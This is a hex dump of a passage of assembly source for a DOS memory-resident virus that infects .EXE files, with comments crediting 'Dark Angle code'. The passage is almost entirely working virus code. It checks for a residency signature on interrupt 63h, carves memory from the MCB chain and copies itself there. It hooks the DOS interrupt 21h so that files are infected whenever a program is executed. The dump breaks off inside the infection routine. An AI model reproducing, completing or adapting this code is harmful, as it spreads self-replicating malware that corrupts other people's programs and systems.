|00001060| 5f 72 65 73 69 64 65 6e | 74 3a 0a 20 20 20 20 20 |_residen|t:. |
|00001070| 20 20 20 70 75 73 68 20 | 65 73 0a 20 20 20 20 20 | push |es. |
|00001080| 20 20 20 78 6f 72 20 61 | 78 2c 61 78 0a 20 20 20 | xor a|x,ax. |
|00001090| 20 20 20 20 20 6d 6f 76 | 20 65 73 2c 61 78 0a 0a | mov| es,ax..|
|000010a0| 20 20 20 20 20 20 20 20 | 63 6d 70 20 77 6f 72 64 | |cmp word|
|000010b0| 20 70 74 72 20 65 73 3a | 5b 36 33 68 2a 34 5d 2c | ptr es:|[63h*4],|
|000010c0| 30 30 34 30 68 20 20 20 | 20 20 20 20 20 20 20 20 |0040h | |
|000010d0| 20 20 3b 20 43 68 65 63 | 6b 20 74 6f 20 73 65 65 | ; Chec|k to see|
|000010e0| 20 69 66 20 76 69 72 75 | 73 0a 20 20 20 20 20 20 | if viru|s. |
|000010f0| 20 20 6a 6e 7a 20 67 72 | 61 62 5f 64 61 5f 76 65 | jnz gr|ab_da_ve|
|00001100| 63 74 6f 72 73 20 20 20 | 20 20 20 20 20 20 20 20 |ctors | |
|00001110| 20 20 20 20 20 20 20 20 | 20 20 20 20 3b 20 20 20 | | ; |
|00001120| 69 73 20 61 6c 72 65 61 | 64 79 20 72 65 73 69 64 |is alrea|dy resid|
|00001130| 65 6e 74 0a 20 20 20 20 | 20 20 20 20 6a 6d 70 20 |ent. | jmp |
|00001140| 65 78 69 74 5f 6e 6f 72 | 6d 61 6c 20 20 20 20 20 |exit_nor|mal |
|00001150| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001160| 20 20 20 20 20 20 3b 20 | 20 20 62 79 20 6c 6f 6f | ; | by loo|
|00001170| 6b 69 6e 67 20 66 6f 72 | 20 61 20 34 30 68 0a 20 |king for| a 40h. |
|00001180| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001190| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000011a0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000011b0| 20 3b 20 20 20 73 69 67 | 6e 61 74 75 72 65 20 69 | ; sig|nature i|
|000011c0| 6e 20 74 68 65 20 69 6e | 74 20 36 33 68 0a 20 20 |n the in|t 63h. |
|000011d0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000011e0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000011f0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001200| 3b 20 20 20 6f 66 66 73 | 65 74 20 73 65 63 74 69 |; offs|et secti|
|00001210| 6f 6e 20 6f 66 0a 20 20 | 20 20 20 20 20 20 20 20 |on of. | |
|00001220| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001230| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001240| 20 20 20 20 20 20 20 20 | 3b 20 20 20 69 6e 74 65 | |; inte|
|00001250| 72 72 75 70 74 20 74 61 | 62 6c 65 2e 0a 0a 67 72 |rrupt ta|ble...gr|
|00001260| 61 62 5f 64 61 5f 76 65 | 63 74 6f 72 73 3a 0a 0a |ab_da_ve|ctors:..|
|00001270| 20 20 20 20 20 20 20 20 | 6d 6f 76 20 61 78 2c 33 | |mov ax,3|
|00001280| 35 32 31 68 20 20 20 20 | 20 20 20 20 20 20 20 20 |521h | |
|00001290| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000012a0| 20 20 3b 20 53 74 6f 72 | 65 20 6f 72 69 67 69 6e | ; Stor|e origin|
|000012b0| 61 6c 20 69 6e 74 20 32 | 31 68 0a 20 20 20 20 20 |al int 2|1h. |
|000012c0| 20 20 20 69 6e 74 20 32 | 31 68 20 20 20 20 20 20 | int 2|1h |
|000012d0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000012e0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 3b 20 20 | | ; |
|000012f0| 20 76 65 63 74 6f 72 20 | 70 6f 69 6e 74 65 72 2e | vector |pointer.|
|00001300| 0a 20 20 20 20 20 20 20 | 20 6d 6f 76 20 77 6f 72 |. | mov wor|
|00001310| 64 20 70 74 72 20 63 73 | 3a 5b 62 70 2b 64 6f 73 |d ptr cs|:[bp+dos|
|00001320| 5f 76 65 63 74 6f 72 2d | 31 30 30 68 5d 2c 62 78 |_vector-|100h],bx|
|00001330| 0a 20 20 20 20 20 20 20 | 20 6d 6f 76 20 77 6f 72 |. | mov wor|
|00001340| 64 20 70 74 72 20 63 73 | 3a 5b 62 70 2b 64 6f 73 |d ptr cs|:[bp+dos|
|00001350| 5f 76 65 63 74 6f 72 2b | 32 2d 31 30 30 68 5d 2c |_vector+|2-100h],|
|00001360| 65 73 0a 0a 0a 0a 6c 6f | 61 64 5f 68 69 67 68 3a |es....lo|ad_high:|
|00001370| 0a 20 20 20 20 20 20 20 | 20 70 75 73 68 20 64 73 |. | push ds|
|00001380| 0a 0a 66 69 6e 64 5f 63 | 68 61 69 6e 3a 20 20 20 |..find_c|hain: |
|00001390| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000013a0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000013b0| 20 20 20 20 3b 20 4c 6f | 61 64 20 68 69 67 68 20 | ; Lo|ad high |
|000013c0| 72 6f 75 74 69 6e 65 20 | 74 68 61 74 0a 20 20 20 |routine |that. |
|000013d0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000013e0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000013f0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 3b | | ;|
|00001400| 20 20 20 75 73 65 73 20 | 74 68 65 20 44 4f 53 20 | uses |the DOS |
|00001410| 69 6e 74 65 72 6e 61 6c | 0a 20 20 20 20 20 6d 6f |internal|. mo|
|00001420| 76 20 61 68 2c 35 32 68 | 20 20 20 20 20 20 20 20 |v ah,52h| |
|00001430| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001440| 20 20 20 20 20 20 20 20 | 20 20 20 3b 20 20 20 74 | | ; t|
|00001450| 61 62 6c 65 20 66 75 6e | 63 74 69 6f 6e 20 74 6f |able fun|ction to|
|00001460| 20 66 69 6e 64 0a 20 20 | 20 20 20 69 6e 74 20 32 | find. | int 2|
|00001470| 31 68 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |1h | |
|00001480| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001490| 20 20 20 20 20 20 20 20 | 3b 20 20 20 73 74 61 72 | |; star|
|000014a0| 74 20 6f 66 20 4d 43 42 | 20 61 6e 64 20 74 68 65 |t of MCB| and the|
|000014b0| 6e 0a 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |n. | |
|000014c0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000014d0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000014e0| 20 20 20 20 3b 20 20 20 | 73 63 61 6c 65 73 20 75 | ; |scales u|
|000014f0| 70 20 63 68 61 69 6e 20 | 74 6f 0a 20 20 20 20 20 |p chain |to. |
|00001500| 6d 6f 76 20 64 73 2c 65 | 73 3a 20 77 6f 72 64 20 |mov ds,e|s: word |
|00001510| 70 74 72 20 5b 62 78 2d | 32 5d 20 20 20 20 20 20 |ptr [bx-|2] |
|00001520| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 3b 20 20 | | ; |
|00001530| 20 66 69 6e 64 20 74 6f | 70 2e 20 28 54 68 65 20 | find to|p. (The |
|00001540| 63 6f 64 65 0a 20 20 20 | 20 20 61 73 73 75 6d 65 |code. | assume|
|00001550| 20 64 73 3a 6e 6f 74 68 | 69 6e 67 20 20 20 20 20 | ds:noth|ing |
|00001560| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001570| 20 20 20 20 20 20 20 3b | 20 20 20 69 73 20 6c 6f | ;| is lo|
|00001580| 6e 67 2c 20 62 75 74 20 | 69 74 20 69 73 20 74 68 |ng, but |it is th|
|00001590| 65 0a 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |e. | |
|000015a0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000015b0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000015c0| 20 20 20 20 3b 20 20 20 | 6f 6e 6c 79 20 63 6f 64 | ; |only cod|
|000015d0| 65 20 74 68 61 74 20 77 | 6f 75 6c 64 0a 20 20 20 |e that w|ould. |
|000015e0| 20 20 78 6f 72 20 73 69 | 2c 73 69 20 20 20 20 20 | xor si|,si |
|000015f0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001600| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 3b | | ;|
|00001610| 20 20 20 77 6f 72 6b 20 | 77 68 65 6e 20 61 6e 20 | work |when an |
|00001620| 69 6e 66 65 63 74 65 64 | 0a 20 20 20 20 20 20 20 |infected|. |
|00001630| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001640| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001650| 20 20 20 20 20 20 20 20 | 20 20 20 3b 20 20 20 2e | | ; .|
|00001660| 45 58 45 20 77 61 73 20 | 74 6f 20 62 65 20 6c 6f |EXE was |to be lo|
|00001670| 61 64 65 64 0a 4d 69 64 | 64 6c 65 5f 63 68 65 63 |aded.Mid|dle_chec|
|00001680| 6b 3a 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |k: | |
|00001690| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000016a0| 20 20 20 20 20 20 20 3b | 20 20 20 69 6e 74 6f 20 | ;| into |
|000016b0| 6d 65 6d 6f 72 79 2e 0a | 0a 20 20 20 20 20 63 6d |memory..|. cm|
|000016c0| 70 20 62 79 74 65 20 70 | 74 72 20 64 73 3a 5b 30 |p byte p|tr ds:[0|
|000016d0| 5d 2c 27 4d 27 0a 20 20 | 20 20 20 6a 6e 65 20 43 |],'M'. | jne C|
|000016e0| 68 65 63 6b 34 6c 61 73 | 74 0a 0a 61 64 64 5f 6f |heck4las|t..add_o|
|000016f0| 6e 65 3a 0a 20 20 20 20 | 20 6d 6f 76 20 61 78 2c |ne:. | mov ax,|
|00001700| 64 73 0a 20 20 20 20 20 | 61 64 64 20 61 78 2c 64 |ds. |add ax,d|
|00001710| 73 3a 5b 33 5d 0a 20 20 | 20 20 20 69 6e 63 20 61 |s:[3]. | inc a|
|00001720| 78 0a 0a 20 20 20 20 20 | 6d 6f 76 20 64 73 2c 61 |x.. |mov ds,a|
|00001730| 78 0a 20 20 20 20 20 6a | 6d 70 20 4d 69 64 64 6c |x. j|mp Middl|
|00001740| 65 5f 63 68 65 63 6b 0a | 0a 43 68 65 63 6b 34 6c |e_check.|.Check4l|
|00001750| 61 73 74 3a 0a 20 20 20 | 20 20 63 6d 70 20 62 79 |ast:. | cmp by|
|00001760| 74 65 20 70 74 72 20 64 | 73 3a 5b 30 5d 2c 27 5a |te ptr d|s:[0],'Z|
|00001770| 27 0a 20 20 20 20 20 6a | 6e 65 20 45 72 72 6f 72 |'. j|ne Error|
|00001780| 0a 20 20 20 20 20 6d 6f | 76 20 62 79 74 65 20 70 |. mo|v byte p|
|00001790| 74 72 20 64 73 3a 5b 30 | 5d 2c 27 4d 27 0a 20 20 |tr ds:[0|],'M'. |
|000017a0| 20 20 20 73 75 62 20 77 | 6f 72 64 20 70 74 72 20 | sub w|ord ptr |
|000017b0| 64 73 3a 5b 33 5d 2c 28 | 65 6e 64 63 6f 64 65 2d |ds:[3],(|endcode-|
|000017c0| 73 74 61 72 74 2b 31 35 | 68 29 2f 31 36 68 2b 31 |start+15|h)/16h+1|
|000017d0| 0a 20 20 20 20 20 6a 6d | 70 20 61 64 64 5f 6f 6e |. jm|p add_on|
|000017e0| 65 0a 0a 65 72 72 6f 72 | 3a 0a 20 20 20 20 20 6d |e..error|:. m|
|000017f0| 6f 76 20 62 79 74 65 20 | 70 74 72 20 64 73 3a 5b |ov byte |ptr ds:[|
|00001800| 30 5d 2c 27 5a 27 0a 20 | 20 20 20 20 6d 6f 76 20 |0],'Z'. | mov |
|00001810| 77 6f 72 64 20 70 74 72 | 20 64 73 3a 5b 31 5d 2c |word ptr| ds:[1],|
|00001820| 30 30 38 68 0a 20 20 20 | 20 20 6d 6f 76 20 77 6f |008h. | mov wo|
|00001830| 72 64 20 70 74 72 20 64 | 73 3a 5b 33 5d 2c 28 65 |rd ptr d|s:[3],(e|
|00001840| 6e 64 63 6f 64 65 2d 73 | 74 61 72 74 2b 31 35 68 |ndcode-s|tart+15h|
|00001850| 29 2f 31 36 68 2b 31 0a | 0a 20 20 20 20 20 70 75 |)/16h+1.|. pu|
|00001860| 73 68 20 64 73 0a 20 20 | 20 20 20 70 6f 70 20 61 |sh ds. | pop a|
|00001870| 78 0a 20 20 20 20 20 69 | 6e 63 20 61 78 0a 20 20 |x. i|nc ax. |
|00001880| 20 20 20 70 75 73 68 20 | 61 78 0a 20 20 20 20 20 | push |ax. |
|00001890| 70 6f 70 20 65 73 0a 0a | 0a 0a 0a 0a 6d 6f 76 65 |pop es..|....move|
|000018a0| 5f 76 69 72 75 73 5f 6c | 6f 6f 70 3a 0a 20 20 20 |_virus_l|oop:. |
|000018b0| 20 20 20 20 20 6d 6f 76 | 20 62 78 2c 6f 66 66 73 | mov| bx,offs|
|000018c0| 65 74 20 73 74 61 72 74 | 2d 31 30 30 68 20 20 20 |et start|-100h |
|000018d0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 3b | | ;|
|000018e0| 20 4d 6f 76 65 20 76 69 | 72 75 73 20 69 6e 74 6f | Move vi|rus into|
|000018f0| 20 63 61 72 76 65 64 0a | 20 20 20 20 20 20 20 20 | carved.| |
|00001900| 61 64 64 20 62 78 2c 62 | 70 20 20 20 20 20 20 20 |add bx,b|p |
|00001910| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001920| 20 20 20 20 20 20 20 20 | 20 20 3b 20 20 20 6f 75 | | ; ou|
|00001930| 74 20 6c 6f 63 61 74 69 | 6f 6e 20 69 6e 20 6d 65 |t locati|on in me|
|00001940| 6d 6f 72 79 2e 0a 20 20 | 20 20 20 20 20 20 6d 6f |mory.. | mo|
|00001950| 76 20 63 78 2c 65 6e 64 | 63 6f 64 65 2d 73 74 61 |v cx,end|code-sta|
|00001960| 72 74 0a 20 20 20 20 20 | 20 20 20 70 75 73 68 20 |rt. | push |
|00001970| 62 70 0a 20 20 20 20 20 | 20 20 20 6d 6f 76 20 62 |bp. | mov b|
|00001980| 70 2c 30 30 30 30 68 0a | 0a 6d 6f 76 65 5f 69 74 |p,0000h.|.move_it|
|00001990| 3a 0a 20 20 20 20 20 20 | 20 20 6d 6f 76 20 64 6c |:. | mov dl|
|000019a0| 2c 20 62 79 74 65 20 70 | 74 72 20 63 73 3a 5b 62 |, byte p|tr cs:[b|
|000019b0| 78 5d 0a 20 20 20 20 20 | 20 20 20 6d 6f 76 20 62 |x]. | mov b|
|000019c0| 79 74 65 20 70 74 72 20 | 65 73 3a 5b 62 70 5d 2c |yte ptr |es:[bp],|
|000019d0| 64 6c 0a 20 20 20 20 20 | 20 20 20 69 6e 63 20 62 |dl. | inc b|
|000019e0| 70 0a 20 20 20 20 20 20 | 20 20 69 6e 63 20 62 78 |p. | inc bx|
|000019f0| 0a 20 20 20 20 20 20 20 | 20 6c 6f 6f 70 20 6d 6f |. | loop mo|
|00001a00| 76 65 5f 69 74 0a 20 20 | 20 20 20 20 20 20 70 6f |ve_it. | po|
|00001a10| 70 20 62 70 0a 0a 0a 0a | 68 6f 6f 6b 5f 76 65 63 |p bp....|hook_vec|
|00001a20| 74 6f 72 73 3a 0a 0a 20 | 20 20 20 20 20 20 20 6d |tors:.. | m|
|00001a30| 6f 76 20 61 78 2c 32 35 | 36 33 68 20 20 20 20 20 |ov ax,25|63h |
|00001a40| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001a50| 20 20 20 20 20 20 20 20 | 20 3b 20 48 6f 6f 6b 20 | | ; Hook |
|00001a60| 74 68 65 20 69 6e 74 20 | 32 31 68 20 76 65 63 74 |the int |21h vect|
|00001a70| 6f 72 0a 20 20 20 20 20 | 20 20 20 6d 6f 76 20 64 |or. | mov d|
|00001a80| 78 2c 30 30 34 30 68 20 | 20 20 20 20 20 20 20 20 |x,0040h | |
|00001a90| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001aa0| 20 20 20 20 20 3b 20 20 | 20 77 68 69 63 68 20 6d | ; | which m|
|00001ab0| 65 61 6e 73 20 69 74 20 | 77 69 6c 6c 0a 20 20 20 |eans it |will. |
|00001ac0| 20 20 20 20 20 69 6e 74 | 20 32 31 68 20 20 20 20 | int| 21h |
|00001ad0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001ae0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 3b | | ;|
|00001af0| 20 20 20 70 6f 69 6e 74 | 20 74 6f 20 76 69 72 75 | point| to viru|
|00001b00| 73 20 63 6f 64 65 20 69 | 6e 0a 20 20 20 20 20 20 |s code i|n. |
|00001b10| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001b20| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001b30| 20 20 20 20 20 20 20 20 | 20 20 20 20 3b 20 20 20 | | ; |
|00001b40| 6d 65 6d 6f 72 79 2e 0a | 20 20 20 20 20 20 20 20 |memory..| |
|00001b50| 6d 6f 76 20 61 78 2c 32 | 35 32 31 68 0a 20 20 20 |mov ax,2|521h. |
|00001b60| 20 20 20 20 20 6d 6f 76 | 20 64 78 2c 6f 66 66 73 | mov| dx,offs|
|00001b70| 65 74 20 76 69 72 75 73 | 5f 61 74 74 61 63 6b 2d |et virus|_attack-|
|00001b80| 31 30 30 68 0a 20 20 20 | 20 20 20 20 20 70 75 73 |100h. | pus|
|00001b90| 68 20 65 73 0a 20 20 20 | 20 20 20 20 20 70 6f 70 |h es. | pop|
|00001ba0| 20 64 73 0a 20 20 20 20 | 20 20 20 20 69 6e 74 20 | ds. | int |
|00001bb0| 32 31 68 0a 0a 0a 0a 0a | 20 20 20 20 20 20 20 20 |21h.....| |
|00001bc0| 70 6f 70 20 64 73 0a 0a | 0a 0a 65 78 69 74 5f 6e |pop ds..|..exit_n|
|00001bd0| 6f 72 6d 61 6c 3a 20 20 | 20 20 20 20 20 20 20 20 |ormal: | |
|00001be0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001bf0| 20 20 20 20 20 20 20 20 | 20 20 20 20 3b 20 52 65 | | ; Re|
|00001c00| 74 75 72 6e 20 63 6f 6e | 74 72 6f 6c 20 74 6f 0a |turn con|trol to.|
|00001c10| 20 20 20 20 20 20 20 20 | 70 6f 70 20 65 73 20 20 | |pop es |
|00001c20| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001c30| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001c40| 20 20 3b 20 20 20 69 6e | 66 65 63 74 65 64 20 2e | ; in|fected .|
|00001c50| 45 58 45 0a 20 20 20 20 | 20 20 20 20 6d 6f 76 20 |EXE. | mov |
|00001c60| 61 78 2c 20 65 73 20 20 | 20 20 20 20 20 20 20 20 |ax, es | |
|00001c70| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001c80| 20 20 20 20 20 20 3b 20 | 20 20 28 44 61 72 6b 20 | ; | (Dark |
|00001c90| 41 6e 67 6c 65 20 63 6f | 64 65 2e 29 0a 20 20 20 |Angle co|de.). |
|00001ca0| 20 20 20 20 20 61 64 64 | 20 61 78 2c 20 31 30 68 | add| ax, 10h|
|00001cb0| 0a 20 20 20 20 20 20 20 | 20 61 64 64 20 77 6f 72 |. | add wor|
|00001cc0| 64 20 70 74 72 20 63 73 | 3a 5b 62 70 2b 4f 72 69 |d ptr cs|:[bp+Ori|
|00001cd0| 67 43 53 49 50 2b 32 2d | 31 30 30 68 5d 2c 20 61 |gCSIP+2-|100h], a|
|00001ce0| 78 0a 0a 20 20 20 20 20 | 20 20 20 63 6c 69 0a 20 |x.. | cli. |
|00001cf0| 20 20 20 20 20 20 20 61 | 64 64 20 61 78 2c 20 77 | a|dd ax, w|
|00001d00| 6f 72 64 20 70 74 72 20 | 63 73 3a 5b 62 70 2b 4f |ord ptr |cs:[bp+O|
|00001d10| 72 69 67 53 53 53 50 2b | 32 2d 31 30 30 68 5d 0a |rigSSSP+|2-100h].|
|00001d20| 20 20 20 20 20 20 20 20 | 6d 6f 76 20 73 73 2c 20 | |mov ss, |
|00001d30| 61 78 0a 20 20 20 20 20 | 20 20 20 6d 6f 76 20 73 |ax. | mov s|
|00001d40| 70 2c 20 77 6f 72 64 20 | 70 74 72 20 63 73 3a 5b |p, word |ptr cs:[|
|00001d50| 62 70 2b 4f 72 69 67 53 | 53 53 50 2d 31 30 30 68 |bp+OrigS|SSP-100h|
|00001d60| 5d 0a 20 20 20 20 20 20 | 20 20 73 74 69 0a 0a 20 |]. | sti.. |
|00001d70| 20 20 20 20 20 20 20 78 | 6f 72 20 61 78 2c 61 78 | x|or ax,ax|
|00001d80| 0a 20 20 20 20 20 20 20 | 20 78 6f 72 20 62 70 2c |. | xor bp,|
|00001d90| 62 70 0a 0a 65 6e 64 63 | 72 79 70 74 20 20 6c 61 |bp..endc|rypt la|
|00001da0| 62 65 6c 20 20 62 79 74 | 65 0a 0a 20 20 20 20 20 |bel byt|e.. |
|00001db0| 20 20 20 64 62 20 30 65 | 61 68 0a 4f 72 69 67 43 | db 0e|ah.OrigC|
|00001dc0| 53 49 50 20 64 64 20 30 | 66 66 66 30 30 30 30 30 |SIP dd 0|fff00000|
|00001dd0| 68 0a 4f 72 69 67 53 53 | 53 50 20 64 64 20 3f 0a |h.OrigSS|SP dd ?.|
|00001de0| 0a 65 78 65 5f 61 74 74 | 72 69 62 20 64 77 20 3f |.exe_att|rib dw ?|
|00001df0| 0a 64 61 74 65 5f 73 74 | 61 6d 70 20 64 77 20 3f |.date_st|amp dw ?|
|00001e00| 0a 74 69 6d 65 5f 73 74 | 61 6d 70 20 64 77 20 3f |.time_st|amp dw ?|
|00001e10| 0a 0a 0a 0a 64 6f 73 5f | 76 65 63 74 6f 72 20 64 |....dos_|vector d|
|00001e20| 64 20 3f 0a 0a 62 75 66 | 66 65 72 20 64 62 20 31 |d ?..buf|fer db 1|
|00001e30| 38 68 20 64 75 70 28 3f | 29 20 20 20 20 20 20 20 |8h dup(?|) |
|00001e40| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001e50| 20 20 20 20 20 20 20 3b | 20 2e 45 58 45 20 68 65 | ;| .EXE he|
|00001e60| 61 64 65 72 20 62 75 66 | 66 65 72 2e 0a 0a 0a 0a |ader buf|fer.....|
|00001e70| 0a 3b 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |.;------|--------|
|00001e80| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001e90| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001ea0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001eb0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 0a 0a |--------|------..|
|00001ec0| 0a 76 69 72 75 73 5f 61 | 74 74 61 63 6b 20 70 72 |.virus_a|ttack pr|
|00001ed0| 6f 63 20 20 66 61 72 0a | 20 20 20 20 20 20 20 20 |oc far.| |
|00001ee0| 20 20 20 20 20 20 20 61 | 73 73 75 6d 65 20 63 73 | a|ssume cs|
|00001ef0| 3a 63 6f 64 65 2c 64 73 | 3a 6e 6f 74 68 69 6e 67 |:code,ds|:nothing|
|00001f00| 2c 20 65 73 3a 6e 6f 74 | 68 69 6e 67 0a 0a 0a 20 |, es:not|hing... |
|00001f10| 20 20 20 20 20 20 20 63 | 6d 70 20 61 78 2c 34 62 | c|mp ax,4b|
|00001f20| 30 30 68 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |00h | |
|00001f30| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001f40| 20 3b 20 49 6e 66 65 63 | 74 20 6f 6e 6c 79 20 6f | ; Infec|t only o|
|00001f50| 6e 20 66 69 6c 65 0a 20 | 20 20 20 20 20 20 20 6a |n file. | j|
|00001f60| 7a 20 72 75 6e 5f 6b 69 | 6c 6c 20 20 20 20 20 20 |z run_ki|ll |
|00001f70| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001f80| 20 20 20 20 20 20 20 20 | 20 3b 20 20 20 65 78 65 | | ; exe|
|00001f90| 63 75 74 69 6f 6e 73 2e | 0a 0a 6c 65 61 76 65 5f |cutions.|..leave_|
|00001fa0| 76 69 72 75 73 3a 0a 20 | 20 20 20 20 20 20 20 6a |virus:. | j|
|00001fb0| 6d 70 20 64 77 6f 72 64 | 20 70 74 72 20 63 73 3a |mp dword| ptr cs:|
|00001fc0| 5b 64 6f 73 5f 76 65 63 | 74 6f 72 2d 31 30 30 68 |[dos_vec|tor-100h|
|00001fd0| 5d 0a 0a 0a 0a 72 75 6e | 5f 6b 69 6c 6c 3a 0a 20 |]....run|_kill:. |
|00001fe0| 20 20 20 20 20 20 20 63 | 61 6c 6c 20 69 6e 66 65 | c|all infe|
|00001ff0| 63 74 65 78 65 0a 20 20 | 20 20 20 20 20 20 6a 6d |ctexe. | jm|
|00002000| 70 20 6c 65 61 76 65 5f | 76 69 72 75 73 0a 0a 0a |p leave_|virus...|
|00002010| 0a 0a 0a 69 6e 66 65 63 | 74 65 78 65 3a 20 20 20 |...infec|texe: |
|00002020| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002030| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002040| 20 20 20 20 20 3b 20 53 | 61 6d 65 20 6f 6c 64 20 | ; S|ame old |
|00002050| 77 6f 72 6b 69 6e 67 20 | 68 6f 72 73 65 0a 20 20 |working |horse. |
|00002060| 20 20 20 20 20 20 70 75 | 73 68 20 61 78 20 20 20 | pu|sh ax |
|00002070| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002080| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002090| 3b 20 20 20 72 6f 75 74 | 69 6e 65 20 74 68 61 74 |; rout|ine that|
|000020a0| 20 69 6e 66 65 63 74 73 | 0a 20 20 20 20 20 20 20 | infects|. |
|000020b0| 20 70 75 73 68 20 62 78 | 20 20 20 20 20 20 20 20 | push bx| |
|000020c0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000020d0| 20 20 20 20 20 20 20 20 | 20 20 20 3b 20 20 20 74 | | ; t|
|000020e0| 68 65 20 73 65 6c 65 63 | 74 65 64 20 66 69 6c 65 |he selec|ted file|
|000020f0| 2e 0a 20 20 20 20 20 20 | 20 20 70 75 73 68 20 63 |.. | push c|
|00002100| 78 0a 20 20 20 20 20 20 | 20 20 70 75 73 68 20 65 |x. | push e|
|00002110| 73 0a 20 20 20 20 20 20 | 20 20 70 75 73 68 20 64 |s. | push d|
|00002120| 78 0a 20 20 20 20 20 20 | 20 20 70 75 73 68 20 64 |x. | push d|
|00002130| 73 0a 0a 0a 0a 20 20 20 | 20 20 20 20 20 6d 6f 76 |s.... | mov|
|00002140| 20 63 78 2c 36 34 64 0a | 20 20 20 20 20 20 20 20 | cx,64d.| |
|00002150| 6d 6f 76 20 62 78 2c 64 | 78 0a 0a 66 69 6e 64 6e |mov bx,d|x..findn|
|00002160| 61 6d 65 3a 0a 20 20 20 | 20 20 20 20 20 63 6d 70 |ame:. | cmp|
|00002170| 20 62 79 74 65 20 70 74 | 72 20 64 73 3a 5b 62 78 | byte pt|r ds:[bx|
|00002180| 5d 2c 27 2e 27 0a 20 20 | 20 20 20 20 20 20 6a 7a |],'.'. | jz|
|00002190| 20 6f 5f 6b 0a 20 20 20 | 20 20 20 20 20 69 6e 63 | o_k. | inc|
|000021a0| 20 62 78 0a 20 20 20 20 | 20 20 20 20 6c 6f 6f 70 | bx. | loop|
|000021b0| 20 66 69 6e 64 6e 61 6d | 65 0a 0a 70 72 65 5f 67 | findnam|e..pre_g|
|000021c0| 65 74 5f 6f 75 74 3a 0a | 20 20 20 20 20 20 20 20 |et_out:.| |
|000021d0| 6a 6d 70 20 67 65 74 5f | 6f 75 74 0a 0a 6f 5f 6b |jmp get_|out..o_k|
|000021e0| 3a 0a 20 20 20 20 20 20 | 20 20 63 6d 70 20 62 79 |:. | cmp by|
|000021f0| 74 65 20 70 74 72 20 64 | 73 3a 5b 62 78 2b 31 5d |te ptr d|s:[bx+1]|
|00002200| 2c 27 45 27 20 20 20 20 | 20 20 20 20 20 20 20 20 |,'E' | |
